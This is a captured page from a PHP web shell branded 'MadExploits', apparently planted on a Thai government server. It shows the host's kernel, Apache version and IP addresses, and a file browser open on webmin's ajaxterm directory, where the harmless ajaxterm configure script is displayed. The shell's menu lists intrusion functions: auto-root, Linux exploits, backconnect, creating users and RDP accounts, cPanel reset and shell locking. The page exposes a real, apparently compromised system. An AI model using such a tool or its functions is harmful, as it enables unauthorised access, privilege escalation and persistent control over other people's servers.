Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ajaxterm /
ajaxterm /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
4.7
KB
-rw-r--r--
ajaxterm.1
1.17
KB
-rw-r--r--
ajaxterm.css
1.71
KB
-rw-r--r--
ajaxterm.html
631
B
-rw-r--r--
ajaxterm.js
8.26
KB
-rw-r--r--
ajaxterm.py
14.45
KB
-rwxr-xr-x
configure
1.37
KB
-rwxr-xr-x
configure.initd.gentoo
467
B
-rw-r--r--
configure.initd.redhat
1.39
KB
-rw-r--r--
configure.makefile
471
B
-rw-r--r--
qweb.py
49.12
KB
-rw-r--r--
sarissa.js
26.72
KB
-rw-r--r--
sarissa_dhtml.js
4.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configure
#!/usr/bin/env python import optparse,os parser = optparse.OptionParser() parser.add_option("", "--prefix", dest="prefix",default="/usr/local",help="installation prefix (default: /usr/local)") parser.add_option("", "--confdir", dest="confdir", default="/etc",help="configuration files directory prefix (default: /etc)") parser.add_option("", "--port", dest="port", default="8022", help="set the listening TCP port (default: 8022)") parser.add_option("", "--command", dest="cmd", default=None,help="set the command (default: /bin/login or ssh localhost)") (o, a) = parser.parse_args() print "Configuring prefix=",o.prefix," port=",o.port etc=o.confdir port=o.port cmd=o.cmd bin=os.path.join(o.prefix,"bin") lib=os.path.join(o.prefix,"share/ajaxterm") man=os.path.join(o.prefix,"share/man/man1") file("ajaxterm.bin","w").write(file("configure.ajaxterm.bin").read()%locals()) file("Makefile","w").write(file("configure.makefile").read()%locals()) if os.path.isfile("/etc/gentoo-release"): file("ajaxterm.initd","w").write(file("configure.initd.gentoo").read()%locals()) elif os.path.isfile("/etc/fedora-release") or os.path.isfile("/etc/redhat-release"): file("ajaxterm.initd","w").write(file("configure.initd.redhat").read()%locals()) else: file("ajaxterm.initd","w").write(file("configure.initd.debian").read()%locals()) os.system("chmod a+x ajaxterm.bin") os.system("chmod a+x ajaxterm.initd")
Close